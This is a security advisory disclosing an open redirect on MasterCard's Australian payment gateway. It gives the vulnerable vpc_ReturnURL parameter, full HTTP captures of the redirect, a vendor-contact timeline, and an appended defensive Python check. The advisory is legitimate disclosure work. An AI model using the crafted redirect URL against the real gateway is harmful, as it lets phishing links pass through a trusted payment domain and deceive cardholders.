
MasterCard Open Redirect

Date: 28 Jul 2014
Reported by: Anastasios Monachos
Type: packetstorm
Source: packetstormsecurity.com

MasterCard Open Redirect on mastercard.com.a

Code
`=======================================================================  
MasterCard - Open Redirect  
=======================================================================  
  
Affected Domain : mastercard.com.au  
Local/Remote : Remote  
Severity : Very Low  
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>  
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]  
  
[Summary]  
  
Certain unspecified input is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.  
  
[Vulnerability Details]  
  
GET Request:  
------------  
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1  
Host: migs.mastercard.com.au  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
  
GET Response:  
-------------  
HTTP/1.1 302 Found  
Date: Mon, 23 May 2014 12:26:51 GMT  
Server: Apache  
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"  
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure  
Expires: Sun, 15 Jun 1990 00:00:00 GMT  
Cache-Control: no-cache  
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure  
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8  
Pragma: no-cache  
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478  
Content-Language: en  
Content-Length: 0  
Keep-Alive: timeout=15, max=79  
Connection: Keep-Alive  
Content-Type: text/html;charset=iso-8859-1  
  
Follow up GET Request I:  
------------------------  
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1  
Host: migs.mastercard.com.au  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
  
GET follow up Response I:  
-------------------------  
HTTP/1.1 302 Found  
Date: Mon, 23 May 2014 12:27:10 GMT  
Server: Apache  
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"  
Expires: Sun, 15 Jun 1990 00:00:00 GMT  
Cache-Control: no-cache  
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure  
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8  
Pragma: no-cache  
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7  
Content-Language: en  
Content-Length: 0  
Keep-Alive: timeout=15, max=100  
Connection: Keep-Alive  
Content-Type: text/html;charset=iso-8859-1  
  
GET follow up Request II:  
-------------------------  
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1  
Host: www.google.com  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
  
GET follow up Response II:  
--------------------------  
HTTP/1.1 302 Found  
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg  
Cache-Control: private  
Content-Type: text/html; charset=UTF-8  
Date: Mon, 23 May 2014 12:27:41 GMT  
Server: gws  
Content-Length: 258  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
Alternate-Protocol: 80:quic  
  
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">  
<TITLE>302 Moved</TITLE></HEAD><BODY>  
<H1>302 Moved</H1>  
The document has moved  
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.  
</BODY></HTML>  
  
  
[Time-line]  
  
23/06/2014 - Advisory created  
23/06/2014 - Mastercard notified: no response  
25/06/2014 - Vendor contacted again - different department: no response  
08/07/2014 - Re-contacted both departments: no response  
27/07/2014 - Advisory published  
`
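
A server-side check that would stop the redirect shown in the capture above, as an added example that is not part of the original advisory and not MasterCard's code. The parameter names vpc_ReturnURL and vpc_Merchant come from the capture; the function names, the merchant id and the shop.example origin are hypothetical, and the per-merchant registry of return origins is an assumed design.

```python
from urllib.parse import urlsplit, urlencode

# Constructed sample registry: merchant id -> return origins agreed at onboarding.
# The merchant id and shop.example are placeholders, not values from the advisory.
REGISTERED_RETURN_ORIGINS = {
    "TESTMERCHANT01": {("https", "shop.example", 443)},
}
DEFAULT_PORTS = {"https": 443, "http": 80}


def safe_return_url(merchant_id, return_url):
    """Return return_url only if its origin is registered for merchant_id, else None."""
    allowed = REGISTERED_RETURN_ORIGINS.get(merchant_id or "")
    if not allowed or not return_url:
        return None  # no merchant context means nothing to validate against
    # Backslashes, whitespace and control characters are parsed differently by
    # browsers and by urlsplit, so refuse them outright.
    if any(c == "\\" or c.isspace() or ord(c) < 0x20 for c in return_url):
        return None
    try:
        parts = urlsplit(return_url)
        port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)
    except ValueError:  # malformed port or IPv6 literal
        return None
    if parts.username is not None or parts.fragment:
        return None  # user@host tricks and fragments are never needed here
    if (parts.scheme, parts.hostname, port) not in allowed:
        return None
    return return_url


def build_response(params, result):
    """Return (status, Location) for a vpcpay-style request; Location is None on error."""
    target = safe_return_url(params.get("vpc_Merchant"), params.get("vpc_ReturnURL"))
    if target is None:
        # Render the error on the gateway's own page instead of redirecting.
        return 400, None
    sep = "&" if urlsplit(target).query else "?"
    return 302, target + sep + urlencode(result)
```

With the request from the advisory (vpc_ReturnURL present, vpc_Merchant absent), build_response returns a 400 with no Location header, so the error message stays on the gateway's own domain.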
